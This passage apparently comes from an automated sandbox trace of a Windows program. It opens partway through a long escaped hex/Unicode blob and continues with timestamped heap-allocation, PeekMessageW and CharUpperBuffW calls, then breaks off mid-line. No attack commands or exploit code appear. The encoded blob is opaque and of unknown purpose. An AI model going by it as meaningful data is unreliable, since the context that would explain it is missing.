8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0267.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0267.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0267.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0267.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0267.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0267.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0267.727] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0267.727] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d720 | out: hHeap=0x25c0000) returned 1 [0267.727] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0267.728] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0267.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0267.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0267.728] CharUpperBuffW (in: lpsz="A4B00E03609", cchLength=0xb | out: lpsz="A4B00E03609") returned 0xb [0267.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0267.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0267.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0267.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1738 [0267.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0267.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0267.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0267.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0267.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0267.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1948 [0267.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0267.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0267.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0267.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0267.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1818 [0267.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0267.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0267.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0267.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaf0 [0267.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0267.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0267.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0267.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0267.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0267.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0267.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0267.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0267.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0267.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0267.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0267.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0267.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0267.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0267.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0267.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0267.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0267.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0267.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0267.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0267.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0267.730] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0267.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0267.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0267.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0267.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0267.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0267.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0267.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0267.731] CharUpperBuffW (in: lpsz="SSA4B00E03609", cchLength=0xd | out: lpsz="SSA4B00E03609") returned 0xd [0267.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0267.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0267.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0267.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0267.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0267.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0267.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0267.731] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0267.731] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0267.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0267.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0267.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0267.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0267.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0267.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0267.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0267.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0267.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0267.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0267.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0267.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0267.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0267.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0267.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0267.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0267.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0267.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0267.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0267.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0267.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0267.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0267.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0267.733] RtlAllocateHeap 